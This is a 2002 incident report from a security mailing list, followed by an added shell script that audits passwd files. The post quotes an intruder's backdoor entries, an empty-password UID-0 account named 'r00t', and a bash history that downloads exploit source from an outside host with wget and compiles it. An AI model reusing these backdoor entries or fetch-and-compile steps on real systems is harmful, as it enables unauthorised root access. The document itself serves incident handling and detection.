watching them -after the fact
From: Alvin Oga (alvin.sec@Mail.Linux-Consulting.com)
Date: 03/25/02
Date: Sun, 24 Mar 2002 23:11:37 -0800 (PST)
From: Alvin Oga <alvin.sec@Mail.Linux-Consulting.com>
To: incidents@securityfocus.com
hi ya
this machine does NOT have su, wget, gcc installed
so they couldn't do much ???
they also created an empty dir: "/dev/ /"
( yes... a space as its filename )
c ya
alvin
cat /etc/passwd
...
-->> karlin::1001:1001::/tmp:/bin/bash
-->> r00t::0:0::/tmp:/bin/bash
cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c
exit
su r00t
w
exit
#
# end of history
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
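
Added example (not part of the original post): a small audit for the traits visible in the two passwd entries and the "/dev/ /" directory above, namely an empty password field, UID 0 under a name other than root, a home directory under /tmp, and a directory entry whose name is only whitespace. The function names and the root/daemon sample lines are constructed for illustration; `-mindepth`/`-maxdepth` assume GNU or BSD find.

```shell
#!/bin/sh
# Added example, not code from the original post.

# audit_passwd [FILE]: print one "reason:login" line per suspicious trait.
# Reads stdin when FILE is omitted. Assumes passwd(5) format (7 fields).
audit_passwd() {
    awk -F: '
        /^#/ || NF == 0         { next }                       # comments, blanks
        NF != 7                 { print "malformed:" $1; next }
        $2 == ""                { print "empty-password:" $1 } # no password set
        $3 == 0 && $1 != "root" { print "uid0-not-root:" $1 }  # second superuser
        $6 ~ /^\/(var\/)?tmp(\/|$)/ { print "tmp-home:" $1 }   # world-writable home
    ' "${1:--}"
}

# find_blank_names DIR: list entries directly under DIR whose names consist
# only of whitespace, like the "/dev/ /" directory reported in the post.
find_blank_names() {
    find "$1" -mindepth 1 -maxdepth 1 ! -name '*[![:space:]]*' -print
}

# Constructed sample: the two entries quoted in the post (without the "-->>"
# markers) plus two ordinary accounts added for contrast.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karlin::1001:1001::/tmp:/bin/bash
r00t::0:0::/tmp:/bin/bash
EOF
}

# Run with --demo to audit the constructed sample.
if [ "${1:-}" = "--demo" ]; then
    sample_passwd | audit_passwd
fi
```

On a live host, run `audit_passwd /etc/passwd` and `find_blank_names /dev`; any output is worth a closer look.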